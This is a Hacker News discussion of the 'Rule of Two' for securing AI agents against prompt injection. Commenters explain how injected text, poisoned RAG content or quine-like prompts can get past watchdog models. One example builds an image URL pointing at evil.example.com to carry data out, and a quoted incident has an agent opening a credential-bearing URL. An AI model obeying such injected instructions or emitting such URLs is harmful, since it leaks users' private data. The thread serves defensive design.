Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I really liked Simon's Willison's [1] and Meta's [2] approach using the "Rule of Two". You can have no more than 2 of the following:

- A) Process untrustworthy input - B) Have access to private data - C) Be able to change external state or communicate externally.

It's not bullet-proof, but it has helped communicate to my management that these tools have inherent risk when they hit all three categories above (and any combo of them, imho).

[EDIT] added "or communicate externally" to option C.

[1] https://simonwillison.net/2025/Nov/2/new-prompt-injection-pa... [2] https://ai.meta.com/blog/practical-ai-agent-security/





It's really vital to also point out that (C) doesn't just mean agentically communicate externally - it extends to any situation where any of your users can even access the output of a chat or other generated text.

You might say "well, I'm running the output through a watchdog LLM before displaying to the user, and that watchdog doesn't have private data access and checks for anything nefarious."

But the problem is that the moment someone figures out how to prompt-inject a quine-like thing into a private-data-accessing system, such that it outputs another prompt injection, now you've got both (A) and (B) in your system as a whole.

Depending on your problem domain, you can mitigate this: if you're doing a classification problem and validate your outputs that way, there's not much opportunity for exfiltration (though perhaps some might see that as a challenge). But plaintext outputs are difficult to guard against.


Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker?

Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly.


Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.

Yes, even a GET request can change the state of the external world, even if that's strictly speaking against the spec.

Wasn't there a HN post where someone made their website look different to LLMs or webscrapers than a typical user? I can't seem to find the post but that could add an extra layer (I mean it is all different if you're viewing from a browser vs curl)

Yes, and get requests with the sensitive data as query parameters are often used to exfiltrate data. The attackers doesn't even need to set up a special handler, as long as they can read the access logs.

Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at system design level, they belong to the same class. I.e. LLMs are little people on a chip; don't put one where you wouldn't put the other.

They are worse than people: LLM combine toddler level critical thinking with intern level technical skills, and read much much faster than any person can.

Right. But my point is, they belong to the bucket labeled "people", not the one labeled "software", for purpose of system design.

So if an agent has no access to non-public data, that's (A) and (C) - the worst an attacker can do, as you note, is socially engineer themselves.

But say you're building an agent that does have access to non-public data - say, a bot that can take your team's secret internal CRM notes about a client, or Top Secret Info about the Top Secret Suppliers relevant to their inquiry, or a proprietary basis for fraud detection, into account when crafting automatic responses. Or, if you even consider the details of your system prompt to be sensitive. Now, you have (A) (B) and (C).

You might think that you can expressly forbid exfiltration of this sensitive information in your system prompt. But no current LLM is fully immune to prompt injection that overrides its system prompt from a determined attacker.

And the attack doesn't even need to come from the user's current chat messages. If they're able to poison your database - say, by leaving a review or comment somewhere with the prompt injection, then saying something that's likely to bring that into the current context via RAG, that's also a way of injecting.

This isn't to say that companies should avoid anything that has (A) (B) and (C) - tremendous value lies at this intersection! The devil's in the details: the degree of sensitivity of the information, the likelihood of highly tailored attacks, the economic and brand-integrity consequences of exfiltration, the tradeoffs against speed to market. But every team should have this conversation and have open eyes before deploying.


Your elaboration seems to assume that you already have (C). I was asking, how do you get to (C) — what made you say "(C) extends to any situation where any of your users can even access the output of a chat or other generated text"?

I think it’s because the state is leaving the backend server running the LLM and output to the browser, where various attacks are possible to send requests out to the internet (either directly or through social engineering).

Avoiding C means the output is strictly used within your system.

These problems will never be fully solved given how LLMs work… system prompts, user inputs, at the end of the day it’s all just input to the model.


It baffles me that we've spent decades building great abstractions to isolate processes with containers and VM's, and we've mostly thrown it out the window with all these AI tools like Cursor, Antigravity, and Claude Code -- at least in their default configurations.

Exfiltrating other people's code is the entire reason why "agentic AI" even exists as a business.

It's this decade's version of "they trust me, dumb fucks".


Plus arbitrary layers of government censorship, plus arbitrary layers of corporate censorship.

Plus anything that is not just pure "generating code" now adds a permanent external dependency that can change or go down at any time.

I sure hope people are just using cloud models in hopes they are improving open source models tangentially? Thats what is happening right?


I recall that. In this case, you have only A and B and yet, all of your secrets are in the hands of an attacker.

It's great start, but not nearly enough.

EDIT: right, when we bundle state with external Comms, we have all three indeed. I missed that too.


Not exactly. Step E in the blog post:

> Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user's credentials.

fulfills the requirements for being able to change external state


I disagree. No state "owned" by LLM changed, it only sent a request to the internet like any other.

EDIT: In other words, the LLM didn't change any state it has access to.

To stretch this further - clicking on search results changes the internal state of Google. Would you consider this ability of LLM to be state-changing? Where would you draw the line?


[EDIT]

I should have included the full C option:

Change state or communicate externally. The ability to call `cat` and then read results would "activate" the C option in my opinion.


What do you mean? The last part in this case is also present, you can change external state by sending a request with the captured content.

Yeah, makes perfect sense, but you really lose a lot.

You can't process untrustworthy data, period. There are so many things that can go wrong with that.

that's basically saying "you can't process user input". sure you can take that line, but users wont find your product to be very useful

Something need to process the untrustworthy data before it can become trustworthy =/

your browser is processing my comment



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: